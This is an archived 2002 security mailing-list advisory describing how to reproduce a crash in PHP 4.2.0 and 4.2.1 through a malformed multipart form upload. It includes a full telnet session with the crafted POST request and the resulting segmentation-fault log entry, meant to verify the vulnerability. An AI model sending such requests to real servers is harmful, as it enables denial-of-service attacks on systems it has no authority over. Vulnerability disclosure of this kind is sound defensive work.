[EXPL] How to Reproduce PHP Segfault

From: support@securiteam.com
Date: 07/24/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 24 Jul 2002 08:43:15 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  How to Reproduce PHP Segfault
------------------------------------------------------------------------

SUMMARY

As we reported in our previous articles:
<http://www.securiteam.com/securitynews/5XP0N0K7PY.html> PHP Security
Vulnerability in Multipart FORM Data Handling and
<http://www.securiteam.com/securitynews/5YP0O0K7PO.html> Additional
Details Released on PHP Security Vulnerability in Multipart FORM Data
Handling, an attack against PHP allows remote attackers to cause it to
crash and execute arbitrary code. The following is a simply test that can
be done to verify the existence of the vulnerability.

DETAILS

Exploit:
The following is an example on how to reproduce the segmentation violation
in PHP 4.2.0 & PHP 4.2.1 with Apache 1.3.26 on Linux x86:

[jdog@wonderland logs]$ telnet 192.168.x.x 80
Trying 192.168.x.x...
Connected to 192.168.x.x.
Escape character is '^]'.
POST /chad_owns_me.php HTTP/1.0
Content-type: multipart/form-data; boundary=---------------------------123
Content-length: 129

- -----------------------------123
Content-Disposition: filename

http://www.rapid7.com/
- -----------------------------123--

Connection closed by foreign host.
[jdog@wonderland logs]$ cat error_log
[Tue Jul 23 11:11:52 2002] [notice] child pid 8948 exit signal
Segmentation fault (11)
[jdog@wonderland logs]$

Note that a path to an existing PHP file must be used otherwise the PHP
interpreter will not be invoked.

ADDITIONAL INFORMATION

The information has been provided by <mailto:jtesta@rapid7.com> Joseph S.
Testa II.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages